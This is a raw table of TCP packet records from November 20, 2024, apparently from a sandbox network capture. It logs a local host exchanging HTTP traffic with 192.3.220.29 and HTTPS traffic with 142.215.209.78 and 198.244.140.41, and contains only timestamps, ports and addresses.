                                                                                                            Nov 20, 2024 16:57:37.344275951 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.344332933 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.344540119 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.344988108 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.349497080 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.349559069 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.349890947 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.350033998 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.354532003 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.354585886 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.354784966 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.355437994 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.359725952 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.359855890 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.359884977 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.359884977 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.364882946 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.364937067 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.365012884 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.365314960 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.370151043 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.370163918 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.370198965 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.371957064 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.372211933 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.372252941 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.372252941 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.377309084 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.377479076 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.377723932 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.377774000 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.386409998 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.386425972 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.386471033 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.386471033 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.390984058 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.391052961 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.391226053 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.391268969 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.396344900 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.396418095 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.396478891 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.396564960 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.522515059 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.522624016 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.522712946 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.522753954 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.524490118 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.524533987 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.526230097 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.526282072 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.527007103 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.527051926 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.533364058 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.533412933 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.533704996 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.533880949 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.537605047 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.537650108 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.537776947 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.538177967 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.541805983 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.541948080 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.542102098 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.542280912 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.546164036 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.546225071 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.546478987 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.547128916 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.550438881 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.550600052 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.550740957 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.550775051 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.552246094 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.552258968 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.553936958 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.555488110 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.555527925 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.555547953 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.555684090 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.559673071 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.559775114 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.560075045 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.560123920 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.563951015 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.563997030 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.564526081 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.564560890 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.568209887 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.568631887 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.568917036 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.568977118 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.572516918 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.572565079 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.573154926 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.573199987 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.576908112 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.576950073 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.577124119 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.577231884 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.581161976 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.581248999 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.581299067 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.581299067 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.585485935 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.585530043 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.585562944 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.585604906 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.589740038 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.589795113 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.590254068 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.590534925 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.594185114 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.594705105 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.594749928 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.594749928 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.598275900 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.598350048 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.598429918 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.598504066 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.602582932 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.603446007 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.603507042 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.603507042 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.607078075 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.607243061 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.607280016 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.607280016 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.611252069 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.611382008 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.611399889 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.611617088 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.615500927 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.615557909 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.615746021 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.615911007 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.624187946 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.624247074 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:41.876142979 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:41.876210928 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:46.284885883 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:46.284929037 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:46.284987926 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:46.299495935 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:46.299516916 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:47.984968901 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:47.985080004 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:47.996104002 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:47.996125937 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:47.996401072 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.122785091 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.167332888 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.418176889 CET49169443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:48.418229103 CET44349169198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.418284893 CET49169443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:48.420093060 CET49169443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:48.420103073 CET44349169198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.461529970 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.461558104 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.461611986 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.461626053 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.493221045 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.493228912 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.493285894 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.493285894 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.493311882 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.493365049 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.662630081 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:48.662642956 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.662657022 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.662705898 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.662723064 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.662870884 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.692486048 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.692497969 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.692542076 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.692560911 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.692583084 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.718719006 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.718729973 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.718791962 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.718806982 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.738342047 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.738398075 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.738419056 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.738434076 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.738486052 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.758260965 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.758270025 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.758344889 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.758354902 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.866099119 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.866169930 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.866179943 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.866206884 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.866261005 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.881588936 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.881598949 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.881656885 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.881659031 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.881712914 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.902265072 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.902273893 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.902312040 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.902318001 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.902359009 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.908631086 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.908639908 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.908678055 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.908689022 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.908742905 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.926007986 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.926016092 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.926081896 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.926094055 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.939579010 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.939645052 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.939656019 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.939677000 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.939729929 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.960335970 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.960344076 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:48.960406065 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:48.960419893 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.130871058 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.130939960 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.130956888 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.130973101 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.130985022 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.131004095 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131007910 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.131011009 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131046057 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.131051064 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131058931 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131067991 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.131068945 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131095886 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.131107092 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131150007 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.131151915 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131159067 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131165028 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.131165028 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.131166935 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131205082 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131211996 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.131228924 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131275892 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.131282091 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131282091 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.131290913 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131328106 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.131333113 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131356955 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131402969 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.131409883 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.131489038 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.131603003 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.138580084 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.138652086 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.138659954 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.146476030 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.146536112 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.146549940 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.153753996 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.153815031 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.153824091 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.165214062 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.165273905 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.165282011 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.173744917 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.173810959 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.173818111 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.183788061 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.183851004 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.183862925 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.257215977 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.257286072 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.257298946 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.266339064 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.266349077 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.266410112 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.266419888 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.271873951 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.271881104 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.271927118 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.271934986 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.271954060 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.279479980 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.279521942 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.279546022 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.279556990 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.279628038 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.285216093 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.285223961 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.285281897 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.285290956 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.290647984 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.290709972 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.290715933 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.297759056 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.297808886 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.297816038 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.302947998 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.303004026 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.303014040 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.308489084 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.308551073 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.308569908 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.314826012 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.314884901 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.314893007 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.319924116 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.319983006 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.319989920 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.325767994 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.325845003 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.325855970 CET44349168142.215.209.78192.168.2.22
